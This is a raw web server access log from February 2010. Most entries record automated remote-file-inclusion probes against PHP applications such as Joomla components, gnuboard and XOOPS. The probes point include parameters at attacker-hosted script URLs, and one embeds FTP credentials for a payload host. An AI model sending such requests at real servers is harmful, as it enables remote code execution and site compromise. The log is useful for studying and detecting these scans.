200.219.195.66 - - [15/Feb/2010:03:41:49 -0500] "GET /logs/access_log.Q109121100/error.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.219.195.66 - - [15/Feb/2010:03:41:49 -0500] "GET /error.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.219.195.66 - - [15/Feb/2010:03:41:49 -0500] "GET /logs/error.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:41:55 -0500] "GET /logs/access_log.Q110020600///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:03:42:11 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.54.22.2 - - [15/Feb/2010:03:42:19 -0500] "GET ///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 243 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
74.54.22.2 - - [15/Feb/2010:03:42:19 -0500] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 248 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
204.12.11.202 - - [15/Feb/2010:03:42:33 -0500] "GET /logs/access_log.Q110011600//tools/send_reminders.php?noSet=0&includedir=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
204.12.11.202 - - [15/Feb/2010:03:42:34 -0500] "GET /logs/access_log.Q109051900//tools/send_reminders.php?noSet=0&includedir=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.72.64.119 - - [15/Feb/2010:03:42:44 -0500] "GET /logs/access_log.Q109122700//include/setup.php?dir=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
61.72.64.119 - - [15/Feb/2010:03:42:44 -0500] "GET //include/setup.php?dir=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
61.72.64.119 - - [15/Feb/2010:03:42:44 -0500] "GET /logs//include/setup.php?dir=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:42:53 -0500] "GET /logs//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:42:54 -0500] "GET /logs/access_log.Q110012500%20%20//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:42:54 -0500] "GET //write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
200.219.195.66 - - [15/Feb/2010:03:43:04 -0500] "GET /logs/access_log.Q110020700/error.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:43:51 -0500] "GET /logs/access_log.Q110012500%20%20//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:43:51 -0500] "GET //write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:43:51 -0500] "GET /logs//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:43:51 -0500] "GET /logs/access_log.Q109091100%20%20//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:43:58 -0500] "GET /logs/access_log.Q110010400%20%20///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
212.241.177.123 - - [15/Feb/2010:03:44:08 -0500] "GET /logs/access_log.Q110013100%20%20//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:44:21 -0500] "GET ////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:44:21 -0500] "GET /logs/access_log.Q109062100%20%20////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:44:22 -0500] "GET /logs/access_log.Q109091100%20%20//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:44:22 -0500] "GET /logs////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:44:25 -0500] "GET /logs////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:44:25 -0500] "GET /logs/access_log.Q109062100%20%20////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:44:26 -0500] "GET ////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:44:29 -0500] "GET /logs/access_log.Q109062100%20%20////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:44:29 -0500] "GET /logs////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:44:29 -0500] "GET ////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:44:33 -0500] "GET /logs/access_log.Q110020600%20%20///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
67.195.115.186 - - [15/Feb/2010:03:43:50 -0500] "GET /logs/error_log.Q109093000 HTTP/1.0" 200 3571351 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.205.120.218 - - [15/Feb/2010:03:45:45 -0500] "GET /logs/access_log.Q109102200%20%20//pjsfiles/modify.php?installed_config_file=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:46:16 -0500] "GET /logs/access_log.Q109102200%20%20//pjsfiles/modify.php?installed_config_file=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.234.20.117 - - [15/Feb/2010:03:47:22 -0500] "GET /logs/access_log.Q109050800//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
187.45.193.155 - - [15/Feb/2010:03:47:29 -0500] "GET /logs/access_log.Q109062700/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:03:47:40 -0500] "GET /logs/access_log.Q109081500//include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:03:47:40 -0500] "GET /logs/access_log.Q109073100//include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:03:47:49 -0500] "GET /logs/access_log.Q109073100//include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:03:47:49 -0500] "GET /logs/access_log.Q109081500//include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
187.45.193.155 - - [15/Feb/2010:03:47:54 -0500] "GET /logs/access_log.Q109122700/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
187.45.193.155 - - [15/Feb/2010:03:47:54 -0500] "GET /logs/access_log.Q110011500/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
187.45.193.155 - - [15/Feb/2010:03:48:20 -0500] "GET /logs/access_log.Q110011500/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:49:00 -0500] "GET /logs/access_log.Q110011800//xoops//xoops_lib/modules/protector/oninstall.php?mydirname=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:49:00 -0500] "GET /logs//xoops//xoops_lib/modules/protector/oninstall.php?mydirname=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:49:00 -0500] "GET //xoops//xoops_lib/modules/protector/oninstall.php?mydirname=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:50:09 -0500] "GET /logs/access_log.Q110011500//xoops//xoops_lib/modules/protector/oninstall.php?mydirname=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:50:10 -0500] "GET /logs/access_log.Q109070100//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:50:13 -0500] "GET /logs/access_log.Q110013100//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:03:50:18 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.54.22.2 - - [15/Feb/2010:03:50:55 -0500] "GET ///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 243 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
74.54.22.2 - - [15/Feb/2010:03:50:55 -0500] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 248 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
95.108.128.242 - - [15/Feb/2010:02:47:32 -0500] "GET /logs/access_log.Q110021100 HTTP/1.1" 200 6642042 "-" "Yandex/1.01.001 (compatible; Win16; I)"
187.45.193.155 - - [15/Feb/2010:03:51:51 -0500] "GET /logs/access_log.Q109062700/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:52:52 -0500] "GET /logs/access_log.Q110012000//bbs/write_update.php//gnuboard4//bbs/write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
67.195.115.186 - - [15/Feb/2010:03:52:38 -0500] "GET /logs/access_log.Q110012300 HTTP/1.0" 200 2615982 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.140.23.24 - - [15/Feb/2010:03:53:40 -0500] "GET /logs/access_log.Q110011200//bbs/write_update.php//gnuboard4//bbs/write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:03:54:21 -0500] "GET /index.php?body=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:03:54:21 -0500] "GET /logs/index.php?body=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:03:54:21 -0500] "GET /logs/access_log.Q110020200%20%20/index.php?body=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
151.8.79.19 - - [15/Feb/2010:03:54:41 -0500] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
151.8.79.19 - - [15/Feb/2010:03:54:42 -0500] "GET /logs/access_log.Q109102100%20%20//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
151.8.79.19 - - [15/Feb/2010:03:54:45 -0500] "GET //write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
208.70.79.113 - - [15/Feb/2010:03:54:58 -0500] "GET //appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
208.70.79.113 - - [15/Feb/2010:03:54:58 -0500] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
208.70.79.113 - - [15/Feb/2010:03:54:58 -0500] "GET /logs/access_log.Q109110100%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
213.239.230.130 - - [15/Feb/2010:03:55:00 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.239.230.130 - - [15/Feb/2010:03:55:00 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
58.230.162.220 - - [15/Feb/2010:03:55:02 -0500] "GET /logs/error_log.Q110020200%20%20/index.php?body=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.250.124.252 - - [15/Feb/2010:03:55:26 -0500] "GET /logs/access_log.Q109090500%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.250.124.252 - - [15/Feb/2010:03:55:26 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
203.250.124.252 - - [15/Feb/2010:03:55:26 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 200 38402 "-" "Mozilla/5.0"
151.8.79.19 - - [15/Feb/2010:03:55:35 -0500] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
151.8.79.19 - - [15/Feb/2010:03:55:38 -0500] "GET //write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
151.8.79.19 - - [15/Feb/2010:03:55:38 -0500] "GET /logs/access_log.Q109102100%20%20//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
203.250.124.252 - - [15/Feb/2010:03:55:44 -0500] "GET /logs/access_log.Q109090500/?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
87.106.138.217 - - [15/Feb/2010:03:55:49 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.chicagohelpwantedads.com/banners/baner.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
87.106.138.217 - - [15/Feb/2010:03:55:49 -0500] "GET /logs/access_log.Q109090500%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.chicagohelpwantedads.com/banners/baner.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
87.106.138.217 - - [15/Feb/2010:03:55:49 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.chicagohelpwantedads.com/banners/baner.txt?? HTTP/1.1" 200 38402 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:55:56 -0500] "GET /logs/error_log.Q110013100//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
87.106.138.217 - - [15/Feb/2010:03:56:29 -0500] "GET /logs/access_log.Q109090500/?_SERVER[DOCUMENT_ROOT]=http://www.chicagohelpwantedads.com/banners/baner.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.234.20.117 - - [15/Feb/2010:03:56:42 -0500] "GET /logs/access_log.Q110011800//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
210.127.253.75 - - [15/Feb/2010:03:56:50 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=ftp://jinipc:qqqqqqqq@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
210.127.253.75 - - [15/Feb/2010:03:56:50 -0500] "GET /logs/error_log.Q109061600%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=ftp://jinipc:qqqqqqqq@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.826"
210.127.253.75 - - [15/Feb/2010:03:56:50 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=ftp://jinipc:qqqqqqqq@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.826"
62.140.23.24 - - [15/Feb/2010:03:56:51 -0500] "GET /logs/error_log.Q109121800%20%20////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
218.234.20.117 - - [15/Feb/2010:03:56:52 -0500] "GET /logs/access_log.Q109062700//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
208.70.79.113 - - [15/Feb/2010:03:57:08 -0500] "GET /logs/access_log.Q109110100//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:57:13 -0500] "GET /logs/error_log.Q109121800%20%20////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:57:17 -0500] "GET /logs/error_log.Q109121800%20%20////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:03:57:45 -0500] "GET //appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:03:57:45 -0500] "GET /logs/access_log.Q109110100%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:03:57:45 -0500] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
222.122.52.104 - - [15/Feb/2010:03:57:51 -0500] "GET /logs/access_log.Q109090500%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.122.52.104 - - [15/Feb/2010:03:57:51 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 200 38402 "-" "Mozilla/5.0"
222.122.52.104 - - [15/Feb/2010:03:57:53 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:03:58:15 -0500] "GET //appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:03:58:15 -0500] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:03:58:15 -0500] "GET /logs/access_log.Q109110100%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.122.52.104 - - [15/Feb/2010:03:58:40 -0500] "GET /logs/access_log.Q109090500/?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
188.61.181.34 - - [15/Feb/2010:03:59:12 -0500] "GET /logs/access_log.Q109071600%20%20//bemarket/postscript/postscript.php?p_mode=http://musicadelibreria.net/footer?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
208.70.79.113 - - [15/Feb/2010:03:59:21 -0500] "GET /logs/access_log.Q109092200//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
208.70.79.113 - - [15/Feb/2010:03:59:27 -0500] "GET /logs/access_log.Q109071500//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
203.250.124.252 - - [15/Feb/2010:03:59:44 -0500] "GET /logs/access_log.Q109090500%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.250.124.252 - - [15/Feb/2010:03:59:44 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
203.250.124.252 - - [15/Feb/2010:03:59:44 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 200 38402 "-" "Mozilla/5.0"
203.250.124.252 - - [15/Feb/2010:03:59:50 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
203.250.124.252 - - [15/Feb/2010:03:59:50 -0500] "GET /logs/access_log.Q109090500%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.250.124.252 - - [15/Feb/2010:03:59:50 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 200 38402 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:03:59:51 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.249.199.195 - - [15/Feb/2010:03:59:55 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 200 38402 "-" "Mozilla/5.0"
125.249.199.195 - - [15/Feb/2010:03:59:56 -0500] "GET /logs/access_log.Q109090500%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
125.249.199.195 - - [15/Feb/2010:03:59:56 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
125.249.199.195 - - [15/Feb/2010:03:59:59 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
125.249.199.195 - - [15/Feb/2010:03:59:59 -0500] "GET /logs/access_log.Q109090500%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
125.249.199.195 - - [15/Feb/2010:04:00:00 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 200 38402 "-" "Mozilla/5.0"
203.250.124.252 - - [15/Feb/2010:04:00:02 -0500] "GET /logs/access_log.Q109090500/?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
203.250.124.252 - - [15/Feb/2010:04:00:05 -0500] "GET /logs/access_log.Q109090500/?_SERVER[DOCUMENT_ROOT]=http://www.junkers-profly.de/speed/baner.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
87.106.241.31 - - [15/Feb/2010:04:00:15 -0500] "GET /logs///bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.106.241.31 - - [15/Feb/2010:04:00:15 -0500] "GET ///bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
87.106.241.31 - - [15/Feb/2010:04:00:15 -0500] "GET /logs/error_log.Q110020400///bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.249.68.6 - - [15/Feb/2010:04:00:21 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3171A95722B2D1007D2D03J+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
